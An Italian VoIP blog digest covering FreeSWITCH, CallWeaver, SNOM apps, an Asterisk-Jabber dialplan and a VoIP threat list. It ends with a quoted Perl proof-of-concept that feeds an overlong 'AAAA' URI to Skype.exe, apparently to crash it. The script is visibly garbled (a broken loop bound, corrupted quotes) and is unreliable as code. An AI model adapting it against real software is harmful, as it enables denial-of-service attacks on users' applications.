Solo pochi giorni fa era arrivata la prima versione di FreeSWITCH, pochi meno quella di CallWeaver, la prima stabile, la 1.2.0, e lunedi la 1.2.0.1 con qualche piccolo fix.

CallWeaver e’ un fork di Asterisk, dalle idee pero’ molto chiare e con degli obbiettivi ben precisi, non ha caso nella pagina del wiki “Perche migrare a CallWaver?” vi sono una serie di risposte interessanti e divertenti. Devo dire che personalmente mi stanno gia simpatici.

FreeSWITCH e’ arrivato!

Dopo 3 anni di duro lavoro, Anthony Minessale c’e’ riuscito, la lista delle funzionalita’ e’ di sicuro molto interessante.

Certo alcune cose come ad esempio la lista dei codec supportati, l’hardware (zaptel e sangoma pri) o alcuni applicazioni faranno storcere il naso a qualcuno, non essendo allo stesso livello di Asteris, ma i vantaggi non sono pochi.

Per chi volesse FreeSWITCH puo’ addirittura essere integrato in altre applicazioni; vi consiglio di provarlo partendo dall’Installation guide per poi cominciare ad addentrarvi con la Getting Started guide.

Buon divertimento

E’ di 1 mese fa la notizia, direttamente dal blog Nortel, dell’introduzione sul mercato di un nuovo prodotto basato su software Open Source.

Niente appliance, questa volta sara un cd, contenente una (di moda) soluzione unificata per le comunicazion, pensata per le piccole medie imprese, tra i 30 ed i 500 utenti.

Probabbilmente l’unica vera cosa da notare e’ il core del prodotto, basato su  SIPfoundry sipXecs, una scelta decisamente sensata.

xenion di Antifork ha rilasciato una nuova release di quest’ottimo software, per chi gia non lo conoscesse, rtpbreak, e’ in grado di riconoscere, ricostruire ed analizzare qualunuqe sessione RTP.

Le possibilita’ sono davvero tante; tra l’altro il software e’ scritto da  un ragazzo italiano

Mark Collier di SecureLogic, ma non solo, ha pubblicato le slide dell’intervento che ha fatto ad Interop.

Le slide riguardano la sicurezza del mondo VoIP in generale(ppt).

Di recente Sinologic ha pubblicato un’interessante articolo in cui spiega alcune differenze tra il codec G729 Digium rispetto all’implementazione “libera” via Intel SDK.

Innanzitutto il codec G.729 e’ comperto da brevetto, percui a prescindere dal software utilizzato, bisognerebbe pagare una “licenza” per uso commerciale, quindi anche la versine “libera” non e’ liberamente utilizzabile.

Tuttavia in europa i brevetti software non sono legali (almeno per ora, e speriamo per sempre), percui e’ possibile utilizzare la versione prodotta attraverso le librerie intel senza infrangere alcuna legge.

» Read the rest of the entry..

Rispetto a molte altre marche sono sicuramente degli ottimi telefoni, certo, di recente sono state scoperte alcune nuove falle di sicurezza da GNUCitizen riguardanti l’interfaccia di amministrazione, tuttavia c’e’ da dire che alcuni “problemi” sono dovuti più che altro alle cattive impostazioni di default, ma quale sistema di default puo’ definirsi sicuro?!

Sempre la SNOM qualche tempo fa ha indetto lo “snom XML context”, con vari premi e fornendo alcune idee ed  esempi da cui partite.

Di seguito la lista dei vincitori, con le relative applicazioni:

Business category:

• XMLConference by Andreas NeugebauerXmlConference consiste in una Servler scritta per gli snom 3xx con firmware 7.2.3 o superiore ed utilizzale AMI per mostrare le informazioni reltive alle conferenze permettendo di interagire attraverso il telefono setsso.
• EyeOfSnom by Axel JägerUn visualizzatore di immagni richiede firmware 7.2.1 o superiore.

• InterAsterisk by Stefan WillmerothL’applicazione offre varie funzionalita’, dalla rubrica centralizzata,  alla lista delle conference room o dei telefoni occupati. Scritta in PHP.
• Fonzo by Pablo BeyenUn’altra rubrica centralizzata questa volta pero’ scritta in ruby

Lifestyle category:

• SnomSnake by David KreitschmannChe dire, ecco il filmato.
• LunchBreak by Stefan WillmerothUn sistema per organizzare la pausa pranzo, in cui i colleghi posso joinare l’invito che avete inviato, simpatica l’idea.
• TTT by Pablo BeyenTic-Tac-Toe multi player
• Calculator by Siggi LangaufPoteva mancare la calcolatrice?!

Tutte le applicazioni sono scaricabili delle rispettive pagine.

Di recente ho letto un post di Olle, sull’integrazione di Asterisk 1.4 con Jabber, che ci permette di effettuare il re routing delle chiamate basandosi sulla presenza o meno di un “operatore” in Jabber.

Olle scrive: “Permettendo ad Asterisk di connettersi ad un Jabber server attraverso un account, sara’ possiible aggiungere buddies attraverso il dialplan. In questo modo potremmo dedidere dove e come veicolare la chiamata sulla base dello stato dell’account Jabber. Ad esempio se Alice e’ in stato Away, potremmo inoltrare la chiamata direttamente alla voicemail.” Continua scrivendo: “... Asterisk puo’ inviare messaggi di testo ai client Jabber attraverso il dialplan.“.

Di seguito riporto un esmepio di come provare questo descritto da Olle.

exten => 123,1,jabberstatus(asterisk,buddie@server.jabber,STATUS)
exten => 123,2,gotoif($[$[${STATUS}] < 6]:available,unavailable)
exten => 123,3(available),jabbersend(asterisk, buddie@server.jabber, “Hi, $CID(NUM) is calling you!”)
exten => 123,4,Dial(iax2/mog)
exten => 123,5(unavailable),voicemail(u123)

Bello e’

Di recente sono stati pubblicati interessanti documenti relativi alla sicurezza del VoIP (un buon punto di partenza puo’ essere voipsa).

Riporto di seguito, quelli che sono stati definiti i 9 pericoli e vulnerabilita’ del VoIP. L’articlo o le slide mostrate indicano alcuni reali pericoli, a cui siamo esposti attraverso la tecnologia VoIP, sicuramente, non sono tutti, ma e’ un buon punto di partenza per indagare sulla secirezza della vostra rete telefonica.

• Remote eavesdropping
• VoIP hopping
• Vishing
• VoIP SPAM
• Toll fraud
• Skype worms
• Voip over Wifi
• Lack of robust implementation
• Weak default settings

Personalmente, per quanto Skype sia voice over ip, lo escluderei dalla lista, in quanto il suo problema e’ specifico all’implementazione e non relativo alla tecnologia VoIP; cosi come il wifi ed il problema delle configurazioni dei default, in quanto piu generici.

Rimanendo in tema sicurezza vi consiglio l’ascolto di un interessate podcast BlueBox #57 su problemi spcifici di Asterisk e non solo.

Delle altre slide mostrare ad Astricon 2007 le potete leggere su slideshare.

per chi come me fosse stato in vacanza occupandosi di tutto tranne che di voip, ecco una breve panoramica su quanto e’ accaduto nel mondo di asterisk nel frattempo.

30 Luglio - nella mailing list -users di Asterisk e’ copraso un Load balacer per IAX2, che non necessita di Asterisk. Al momento a detta dell’autore e’ in fase di sviluppo, ma da test fatti e’ gia possibile utilizzarlo.
http://www.gradwell.com/tmp/iax_proxy.tar.gz

1 Agosto - SiVuS , e’ stata rilasciata la nuova versione 1.10 per Linux, uno scanner di vulnerabilita SIP.

3 Agosto - [OT] Google Phone, ennesimo annuncio, chissa…

5 Agosto - AsterCRM, e’ nata un alternativa al famoso SugarCRM, pensata per Asterisk, le funzionalita‘ sono ovviamente minori, anche se al momento gia mostra Pop-up when dial in, PoP-up when dial out, Auto-complete, Click-to-dial, Transfer e Exension manager.

7 Agosto - Asterisk 1.2.24 and 1.4.10 released, nel comunicato si consiglia l’upgrade a chi utilizza chan_skinny, che soffriva dell’ennesimo bug. Per il resto sono stati effettuati numerosi fix, in particolare sul chan IAX2.

8 Agosto - chan_mobile, in asterisk_addons. Attraverso questo chan e’ possibile utilizzare cellulari bluetooth come FXO ed il microfono come FXO, bello no

14 Agosto - Iaxclient Branching off 2.0, e’ stato aperto il ramo 2.0 contenente il supporto video in modo ufficiale, prima era presente solo in svn.

15 Agosto - Lightweight Home Security with Indigo and Asterisk, ovvero domotica targata Asterisk,

16 Agosto - [OT ma doveroso] 14 Compleanno di Debian

17 Agosto - Skype, caduto! Le dichiarazioni uffciali negano la possibilita’ di un attacco, ma non molto tempo prima e’ stato pubblicato questo… che abbia influito?!

#!/usr/bin/perl
# Simle Code by Maranax Porex ;D
# Ya Skaypeg!!

for ($i=256; $i>xCCCCC; $i=$i+256){
$eot=’AAAA’ x $i;
call_sp();
}
exit;

sub call_sp(){
$str=�?\�?C:\\Program Files\\Skype\\Phone\\Skype.exe\�? \�?/uri:$eot\�?”;
}